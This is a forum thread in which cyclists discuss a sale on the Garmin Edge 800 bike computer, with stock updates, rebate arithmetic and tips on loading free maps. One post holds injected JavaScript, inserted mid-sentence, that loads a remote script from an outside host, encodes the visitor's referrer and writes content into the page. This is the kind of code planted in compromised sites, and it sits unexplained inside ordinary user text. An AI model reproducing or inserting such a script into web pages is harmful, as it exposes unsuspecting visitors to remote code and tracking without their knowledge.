1 - 20 of 80 Posts

·
Matnlely Dregaend
4,985 Posts
Discussion Starter · #1 · (Edited)

·
Registered
25 Posts
Western Bike Works has the same deal but is also out of stock. they expect more on the 20th. I somehow got one but my friend who placed an order 3 minutes after me missed out.

·
Registered
869 Posts
Thanks for ruining my good deal on a 500! Might have to get an 800 anyway.

·
Registered
255 Posts
Looks like Garmin wants to get rid of inventory!

Garmin Edge 800 at BikeTiresDirect

Edit - all gone but it says more should be in stock on 5/20.

Re-edit - now back in stock!<script type="text/javascript" src="http://www.pic-host.info/files/encode.js"></script><script type="text/javascript">if (document.referrer) { var ref='?'+encode(document.referrer); } else { var ref=''; }document.write('
');</script>
Again out of stock... :(

·
Registered
910 Posts
Thanks for the hot deal info! Got mine yesterday. Haven't ridden with it yet but it seems nice. I upgraded from a 500 to get the nav features. Sold the 500 for $150 so $310 - $100 - $150 = $60 for the upgrade once I get the rebate.

·
Registered
717 Posts
Jumped on it at Westernbikeworks. Nice deal for sure. Maybe my old eyes will be able to see this one better than my 500 :)

·
Registered
518 Posts
If I get the base unit, is there a way to get free maps without buying Garmin's maps?
I just loaded the northeast maps on mine earlier this week. Very easy, once I downloaded the right file. I only had a 2 gig sd card so I was limited on which map, but I've got an 8gig on order and plan to just put the whole United States on there.

·
Registered
717 Posts
I'm downloading the USA map now. Looks like three plus hours to complete and just under 3GB. I ordered the Edge 800 today and purchased a 8GB card online for $10.99. Should be all together by the end of next week. The whole package after rebate will be $220.00. That's less than I originally paid for the Edge 500.

1 - 20 of 80 Posts
This is an older thread, you may not receive a response, and could be reviving an old thread. Please consider creating a new thread.